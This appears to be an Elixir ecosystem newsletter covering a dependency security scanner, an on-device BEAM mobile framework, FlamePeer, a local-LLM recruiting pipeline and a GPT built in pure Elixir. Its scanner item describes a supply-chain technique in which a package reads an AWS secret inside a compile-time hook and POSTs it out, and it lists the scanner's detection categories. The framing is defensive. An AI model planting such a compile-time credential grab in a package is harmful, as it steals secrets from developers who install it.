Welcome to GigaElixir Gazette, your 5-minute digest of Elixir ecosystem news that actually matters.

This week, we look at a supply chain security scanner that catches malicious dependencies before they execute, a framework putting the BEAM natively on mobile devices, and why building a GPT from scratch in Elixir reveals things Python hides.

Someone compromised LiteLLM's PyPI token last month. Three hours, hundreds of thousands of infected installs, 4TB of data stolen from a $10B startup. The attack was three lines of work. The ecosystem did the rest.

Elixir is not immune. A package can call System.get_env("AWS_SECRET_ACCESS_KEY") inside a @before_compile hook and POST the result during mix deps.compile. Your app has not started. Your tests have not run. Vet walks the AST of every dependency in your lock file and flags the patterns that have no legitimate reason to exist in a library: compile-time system commands, credential access, network calls to suspicious endpoints, obfuscated payloads, and slopsquatting detection for names LLMs commonly hallucinate.

The key insight: Elixir's Code.string_to_quoted and Macro.prewalk let you walk dependency code with the same tools the compiler uses. Python cannot do this. mix vet.check catches threats before execution - no runtime, no risk.

Dig into the implementation

Everyone assumed LiveView Native would mean the BEAM running on-device. It did not - LVN needs a Phoenix server. Mob takes the road people actually expected. A thin native shell boots the BEAM directly on Android or iOS. From there, Elixir owns everything. render/1 returns a component tree, NIFs create real native views, and a diff engine patches only what changed. No WebView, no JavaScript, no server round-trips.

The developer experience mirrors Phoenix exactly. mix mob.dev starts a file watcher. Save a file, and the updated module pushes to the device over WiFi via Erlang distribution. Full IEx shell into the running on-device BEAM - inspect GenServer state, trace calls, debug live. OTA updates use the same interpreted-code exception that covers React Native CodePush.

HelloScreen is confirmed working on Android emulator, real Android phone, and iOS simulator. The framework is early, but the architectural bet is clear: if your app logic is already in Elixir, it should stay in Elixir on the phone too.

See the project discussion

FLAME's LocalBackend does not actually mimic a FLAME cluster. If your code depends on distribution working correctly - process placement, data locality, cross-node communication - you have been stuck testing against a real backend like Fly or EC2, or deploying and hoping.

FlamePeer provides a FLAME backend for Erlang :peer nodes. Same distributed semantics, same process spawning behavior, all running locally. From the creator of SafeNIF and FlameEC2, this library uses :peer to spin up real Erlang nodes on your machine. Your FLAME code runs against actual distribution without cloud costs or deployment cycles.

Try FlamePeer

A recruiting workflow that validates resumes with zero-shot classification via Bumblebee/Nx, scores candidates against job descriptions with a local Ollama LLM, and broadcasts results through Phoenix PubSub - all orchestrated by Journey, a DAG-based workflow library.

The architecture is clean. Journey's compute nodes unblock when prerequisites are met. Resume validation runs facebook/bart-large-mnli locally - no API calls, no per-inference cost. Valid resumes trigger parallel summarization and scoring against gemma3:4b. PubSub pushes updates to the LiveView UI in real time. The entire pipeline is open source and runs on your machine.

See the full walkthrough

Bridging C# (Unity) and Elixir usually means fighting protobuf pipelines or eating JSON overhead. DeukPack generates pure Elixir code using native binary pattern matching for serialization - no NIFs, no scheduler blocking. The C# side is zero-allocation and struct-based, optimized for Unity's frame loop.

Built-in MAX_SAFE_LENGTH checks prevent OOM from malformed packets. If you are building real-time multiplayer infrastructure on the BEAM, this is the kind of library that eliminates an entire class of interop pain.

Check the repo

Matthew Sinclair finished a 4-part series building GPT from scratch in Elixir - no Nx, no external dependencies, ~1,500 lines of pure Elixir.

The autograd engine, tokenizer, attention mechanism, Adam optimizer, and autoregressive sampler all built on Value structs and immutable maps. The training loop is a single Enum.reduce that threads {model, optimizer_state} through every step.

The pedagogical payoff is real.

Python's backward() mutates .grad fields via += as a side effect. Elixir's backward/1 returns an immutable gradient map you can hold, compare, and pass to multiple consumers.

The optimizer communicates with the model through ID-keyed maps - {"wte", 2, 5} links a parameter deterministically through the entire round-trip. No shared mutable state, no ambiguity about which parameter is which.

When the author got confused about backpropagation, they could inspect the gradient map directly. That is the advantage of functional ML: it shows its work.

Remember for functional ML implementation:

Read the full series

Deploy your next Elixir app hassle-free with Gigalixir and focus more on coding, less on ops.

We're specifically designed to support all the features that make Elixir special, so you can keep building amazing things without becoming a DevOps expert.

See you next week,

Michael

P.S. Forward this to a friend who loves Elixir as much as you do 💜